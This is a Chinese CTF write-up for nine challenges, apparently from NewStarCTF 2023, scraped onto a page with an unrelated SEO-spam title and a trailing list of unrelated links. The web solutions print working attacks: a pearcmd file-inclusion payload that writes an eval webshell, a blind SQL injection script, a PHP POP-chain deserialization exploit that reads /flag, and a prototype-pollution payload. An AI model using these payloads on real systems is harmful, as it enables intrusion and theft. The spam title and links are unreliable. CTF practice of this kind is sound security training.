当前位置: 首页 > news >正文

哈尔滨网站优化技术艺术签名设计免费版

哈尔滨网站优化技术,艺术签名设计免费版,奉贤注册公司,如何给网站加cdn目录 一、阳光开朗大男孩 二、大怨种 三、2-分析 四、键盘侠 五、滴滴滴 六、Include? 七、medium_sql 八、POP Gadget 九、OtenkiGirl 一、阳光开朗大男孩 1.题目给出了secret.txt和flag.txt两个文件#xff0c;secret.txt内容如下#xff1a; 法治自由公正爱国…目录 一、阳光开朗大男孩 二、大怨种 三、2-分析 四、键盘侠 五、滴滴滴 六、Include? 七、medium_sql 八、POP Gadget 九、OtenkiGirl 一、阳光开朗大男孩 1.题目给出了secret.txt和flag.txt两个文件secret.txt内容如下 法治自由公正爱国公正敬业法治和谐平等友善敬业法治富强公正民主法治和谐法治和谐法治法治公正友善敬业法治文明公正自由平等诚信平等公正敬业法治和谐平等友善敬业法治和谐和谐富强和谐富强和谐富强平等友善敬业公正爱国和谐自由法治文明公正自由平等友善敬业法治富强和谐自由法治和谐法治和谐法治和谐法治法治和谐富强法治文明公正自由公正自由公正自由公正自由在 http://www.atoolbox.net/Tool.php?Id850 进行社会主义核心价值观解密后可以得到 this_password_is_s000_h4rd_p4sssw0rdddd得到一个Key结合flag.txt中的emoji表情可以推断出flag.txt使用了emoji-AES加密。   在 https://aghorler.github.io/emoji-aes/ 进行emoji-AES解密key为s000_h4rd_p4sssw0rdddd得到Flag 二、大怨种 1.题目给出gif图片编写一个脚本提取出gif的每一帧图片 from PIL import Image import osdef extract_frames(gif_path, output_dir): gif Image.open(gif_path) os.makedirs(output_dir, exist_okTrue) try: while True: current_frame gif.tell() output_path os.path.join(output_dir, fframe_{current_frame}.png) gif.save(output_path, PNG) gif.seek(current_frame 1) except EOFError: pass print(提取完成)gif_path 1.gif output_dir ./res/ extract_frames(gif_path, output_dir)其中有一帧图像是这样的   是汉信码可以在 https://tuzim.net/hxdecode/ 在线扫描扫描后得到Flag 三、2-分析 题目描述如下   1.Flag由三个信息构成登录用户名、存在漏洞的文件名、写入的WebShell文件名。 根据我们的常识一般登录请求都是POST方式的请求因此可以先过滤出所有的POST请求 http http.request.method POST可以看到有一个发送给/api/action/login.php的POST请求中有username和password字段   由此推断出登录的用户名为best_admin。 2.其次是存在漏洞的文件名和WebShell文件名可以看到有大量的目录扫描流量先使用WireShark过滤器过滤掉响应状态码为404的响应 http http.response.code ! 404对剩下的流量进行分析关注到1267号流量响应比较奇怪   很明显存在WebShell追踪该流。   由此可以得到剩下的两个信息index.php文件的page参数存在任意文件包含漏洞攻击者通过这个漏洞包含pearcmd.php向服务器中写入了名为wh1t3g0d.php的WebShell。 而后续的流量也可以看到攻击者是利用wh1t3g0d.php这个Shell执行了一些系统命令   由此得到Flag明文best_admin_index.php_wh1t3g0d.php 整体md5后包裹flag{}得到最终flagflag{4069afd7089f7363198d899385ad688b} 四、键盘侠 1.打开题目发现是USB流量结合题目名猜测是键盘流量使用WireShark过滤器过滤出所有的键盘流量然后导出保存为res.pcapng usb.src 1.15.1使用tshark命令对流量数据进行提取并去除空行 tshark -r res.pcapng -T fields -e usb.capdata | sed /^\s*$/d usbdata.txt导出后使用以下脚本进行按键信息提取 normalKeys {04:a, 05:b, 06:c, 07:d, 08:e, 09:f, 0a:g, 0b:h, 0c:i, 0d:j, 0e:k, 0f:l, 10:m, 11:n, 12:o, 13:p, 14:q, 15:r, 16:s, 17:t, 18:u, 19:v, 1a:w, 1b:x, 1c:y, 1d:z,1e:1, 1f:2, 20:3, 21:4, 22:5, 23:6,24:7,25:8,26:9,27:0,28:RET,29:ESC,2a:DEL, 2b:t,2c:SPACE,2d:-,2e:,2f:[,30:],31:\\,32:NON,33:;,34:,35:GA,36:,,37:.,38:/,39:CAP,3a:F1,3b:F2, 3c:F3,3d:F4,3e:F5,3f:F6,40:F7,41:F8,42:F9,43:F10,44:F11,45:F12} shiftKeys {04:A, 05:B, 06:C, 07:D, 08:E, 09:F, 0a:G, 0b:H, 0c:I, 0d:J, 0e:K, 0f:L, 10:M, 11:N, 12:O, 13:P, 14:Q, 15:R, 16:S, 17:T, 18:U, 19:V, 1a:W, 1b:X, 1c:Y, 1d:Z,1e:!, 1f:, 20:#, 21:$, 22:%, 23:^,24:,25:*,26:(,27:),28:RET,29:ESC,2a:DEL, 2b:t,2c:SPACE,2d:_,2e:,2f:{,30:},31:|,32:NON,33:\,34::,35:GA,36:,37:,38:?,39:CAP,3a:F1,3b:F2, 3c:F3,3d:F4,3e:F5,3f:F6,40:F7,41:F8,42:F9,43:F10,44:F11,45:F12} nums [] keys open(usbdata.txt) for line in keys:if len(line)!17:continuenums.append(line[0:2]line[4:6]) keys.close() output for n in nums:if n[2:4] 00 :continueif n[2:4] in normalKeys:if n[0:2]02:output shiftKeys [n[2:4]]else :output normalKeys [n[2:4]]else:output [unknown] print(output :n output)得到如下结果 nw3lc0m3SPACEtoSPACEnewstarSPACEctfSPACE2023SPACEflagSPACEisSPACEhereSPACEvvvvbaaaasffjjwwwwrrissgggjjaaasdddduuwwwwwwwwiiihhddddddgggjjjjjaa1112333888888ESCESC2hhxgbffffbbbnnatCAPCAPffDELlllDELDELaaaDELDELggggDELDELDEL{999DELDEL999DELDEL11DEL9aaaDELDELSPACESPACEDELDELeb2---DELDELa450---DELDEL2f5fSPACESPACESPACEDELDELDEL--DEL7bfc[unknown][unknown][unknown]-8989DELDELdfdfDELDEL4bfa4bfaDELDELDELDEL85848584}}}DELDELDELDELDELDELDEL}]SPACESPACESPACESPACEniceSPACEwork!1yyoouSPACEggotSPACEtthhisSPACEfllag\DEL\表示删除\SPACE\表示空格根据这个按键顺序对数据进行处理后得到flag flag{9919aeb2-a450-2f5f-7bfc-89df4bfa8584}五、滴滴滴 1.题目给出一个wav文件和一个jpg文件其中wav文件听起来像是拨号音利用dtmf2num工具进行拨号音识别   得到拨号音的内容为 52563319066结合题目简介的提示这串数字应该是某处使用的密码因此可以尝试steghide工具来对jpg图片进行隐写内容提取   得到一个txt文件打开即是Flag 六、Include? 1.页面源代码如下。 ?phperror_reporting(0);if(isset($_GET[file])) {$file $_GET[file];if(preg_match(/flag|log|session|filter|input|data/i, $file)) {die(hacker!);}include($file..php);# Something in phpinfo.php!}else {highlight_file(__FILE__);} ?题目过滤了常见的伪协议和日志文件提示 Something in phpinfo.php!所以先去访问phpinfo.phppayload如下 ?filephpinfo查找flag发现fake{Check_register_argc_argv}。   查找register_argc_argv发现为on。   结合标题?pear提示以及register_argc_argv为on知道是要利用pearcmd文件包含达成rce。 payload ?config-create/file/usr/local/lib/php/pearcmd/?eval($_REQUEST[8]);?/tmp/cmd.php然后访问包含一句话木马的cmd.php文件执行远程命令。 ?file/tmp/cmd8system(ls/);?file/tmp/cmd8system(cat/flag);七、medium_sql 1.根据题目可以判断是sql注入先按照常规的测试方法判断出是个布尔盲注。 ?idTMP0919 And if(10,1,0) -- ?idTMP0919 And if(01,1,0) --发第一个有回显第二个没回显说明页面可以根据if判断的结果回显两种真假内容因此是布尔盲注。 2.编写盲注脚本用二分查找。 import requests import timedef condition(res):if Physics in res.text:return Truereturn Falseresult _url xxxxx for _time in range(1, 1000):print(time:%d % _time)left 32right 128while right left:mid (left right) // 2# 获取当前库表名# url f{_url}?idTMP0919 And if((((Ord(sUbstr((Select(grouP_cOncat(table_name))fRom(infOrmation_schema.tables)whEre((tAble_schema) In (dAtabase()))) fRom {_time} FOr 1))))In({mid})),1,0)%23# 获取字段名# url f{_url}?idTMP0919 And if((((Ord(sUbstr((Select(grouP_cOncat(column_name))fRom(infOrmation_schema.columns)whEre((tAble_name) In (here_is_flag))) fRom {_time} FOr 1))))In({mid})),1,0)%23# 获取字段值url f{_url}?idTMP0919 And if((((Ord(sUbstr((Select(flag)fRom(here_is_flag)) fRom {_time} FOr 1))))In({mid})),1,0)%23# 防止请求速率过快time.sleep(0.2)res requests.get(urlurl)if condition(res):result chr(mid)print(result)breakelse:# 获取当前库表名# url f{_url}?idTMP0919 And if((((Ord(sUbstr((Select(grouP_cOncat(table_name))fRom(infOrmation_schema.tables)whEre((tAble_schema) In (dAtabase()))) fRom {_time} FOr 1))))({mid})),1,0)%23# 获取字段名# url f{_url}?idTMP0919 And if((((Ord(sUbstr((Select(grouP_cOncat(column_name))fRom(infOrmation_schema.columns)whEre((tAble_name) In (here_is_flag))) fRom {_time} FOr 1))))({mid})),1,0)%23# 获取字段值url f{_url}?idTMP0919 And if((((Ord(sUbstr((Select(flag)fRom(here_is_flag)) fRom {_time} FOr 1))))({mid})),1,0)%23res requests.get(urlurl)if (condition(res)):left midelse:right mid八、POP Gadget 1.源代码如下。 ?php highlight_file(__FILE__);class Begin{public $name;public function __destruct(){if(preg_match(/[a-zA-Z0-9]/,$this-name)){echo Hello;}else{echo Welcome to NewStarCTF 2023!;}} } class Then{private $func;public function __toString(){($this-func)();return Good Job!;} } class Handle{protected $obj;public function __call($func, $vars){$this-obj-end();} } class Super{protected $obj;public function __invoke(){$this-obj-getStr();}public function end(){die(GAME OVER);} } class CTF{public $handle;public function end(){unset($this-handle-log);} } class WhiteGod{public $func;public $var;public function __unset($var){($this-func)($this-var); } } unserialize($_POST[pop]);2.题目主要考察POP链构造整个链子比较简单。从Begin的__destruct析构函数作为起点开始构造POP链触发到WhiteGod的__unset方法__unset方法中存在一个函数的动态调用可以实现RCE。 POP Gadget如下 Begin::__destruct - Then::__toString - Super::__invoke - Handle::__call - CTF::end - WhiteGod::__unset编写Exp如下 ?php class Begin {public $name;public function __construct($a) {$this-name $a;} } class Then {private $func;public function __construct($a) {$this-func $a;} } class Handle {protected $obj;public function __construct($a) {$this-obj $a;} } class Super {protected $obj;public function __construct($a) {$this-obj $a;} } class CTF {public $handle;public function __construct($a) {$this-handle $a;} } class WhiteGod {public $func;public $var;public function __construct($a, $b) {$this-func $a;$this-var $b;} } // POP Gadget: // Begin::__destruct - Then::toString - Super::__invoke - Handle::__call - CTF::end - WhiteGod::__unset $obj new Begin(new Then(new Super(new Handle(new CTF(new WhiteGod(readfile,/flag)))))); echo urlencode(serialize($obj));需要注意的是一些类中有保护或私有属性的成员因此需要对序列化数据进行URL编码得到 O%3A5%3A%22Begin%22%3A1%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Then%22%3A1%3A%7Bs%3A10%3A%22%00Then%00func%22%3BO%3A5%3A%22Super%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00obj%22%3BO%3A6%3A%22Handle%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00obj%22%3BO%3A3%3A%22CTF%22%3A1%3A%7Bs%3A6%3A%22handle%22%3BO%3A8%3A%22WhiteGod%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A8%3A%22readfile%22%3Bs%3A3%3A%22var%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7D%7D%7D%7D九、OtenkiGirl 1.随便提交一些信息通过抓包或者直接查看附件的源码都能发现下面两个请求地址 第一个获取全部信息可以改变0的值就是获取到指定时间戳之后的信息   第二个提交信息   提交信息必须为 JSON 格式contact和reason字段是必须的例如 POST /submit HTTP/1.1 Content-Type: application/json{ contact: test, reason: test}查看routes/info.js源码考察从数据库中获取数据的函数getInfo   其中第4行和第5行将我们传入的timestamp做了一个过滤使得所返回的数据不早于配置文件中的min_public_time 查看根目录下的config.js和config.default.js后发现config.js并没有配置min_public_time因此getInfo的第5行只是采用了DEFAULT_CONFIG.min_public_time 考虑原型链污染污染min_public_time为我们想要的日期就能绕过最早时间限制获取任意时间的数据 查看routes/submit.js源码发现注入点   其中merge函数第7行存在原型链污染因此只要考虑注入data[__proto__][min_public_time]的值即可 于是构造payload POST /submit HTTP/1.1 Content-Type: application/json{ contact: test, reason: test, __proto__: { min_public_time: 1001-01-01 }}然后为我们再请求/info/0就能得到更多的数据得到flag。 申明本公众号所分享内容仅用于网络安全技术讨论切勿用于违法途径 所有渗透都需获取授权违者后果自行承担与本号及作者无关请谨记守法. 没看够~欢迎关注 免费领取安全学习资料包 渗透工具 技术文档、书籍   面试题 帮助你在面试中脱颖而出 视频 基础到进阶 环境搭建、HTMLPHPMySQL基础学习信息收集SQL注入,XSSCSRF暴力破解等等   应急响应笔记 学习路线
http://www.hkea.cn/news/14320205/

相关文章:

  • 建站程序免费下载广西住房和城乡建设厅
  • 云集网站建设公司网页设计欣赏案例
  • 广东建设厅的网站查询天津seo公司排名
  • 制作介绍的网站模板免费下载企业网站制作找什么人
  • 在哪个网站做游戏视频好淘宝上如何免费开网店
  • 网站建设优化排名上海网站设计大概要多少钱
  • 可信网站代码响应式网站好么
  • 网站服务费一年多少钱网站开发属于什么大学专业
  • 北京 代理前置审批 网站备案什么网站时候做伪静态
  • 新手做网站需要哪些软件深圳搜索引擎优化推广
  • 做系统去哪个网站好phpadmin wordpress
  • 网站流量刷模板建站oem代理
  • 淘宝网站设计模板下载seo交流论坛seo顾问
  • 铁路建设工程网站微信卖货小程序怎么做
  • 四川省红鱼洞水库建设管理网站wordpress批量拿站
  • 精品课程网站设计与实现怎样学做网络推广
  • 中国国际贸易网官网网站描述怎么写利于seo
  • 如何免费建立个人网站怎么查找一个网站开发时间
  • 北京网站设计我选柚米wordpress后台没有写权限
  • 浙江省建设局教育网站网站开发成本如何账务处理
  • 影视怎么建设网站网站优化工作室
  • 科技创业seo自动优化工具
  • wordpress ftp插件北京SEO网站优化公司
  • 建设银行造价咨询中心网站宜兴网站制作
  • 制作板块的网站凡科送审平台
  • 做自己看视频的网站wordpress 手机端APP
  • 分类信息网站推广的意义站长统计入口
  • 网站 权限网站关键词排名外包
  • 深圳官网网站建设wordpress文章经典编辑器
  • 网站推广大概需要多少钱国内免费代理服务器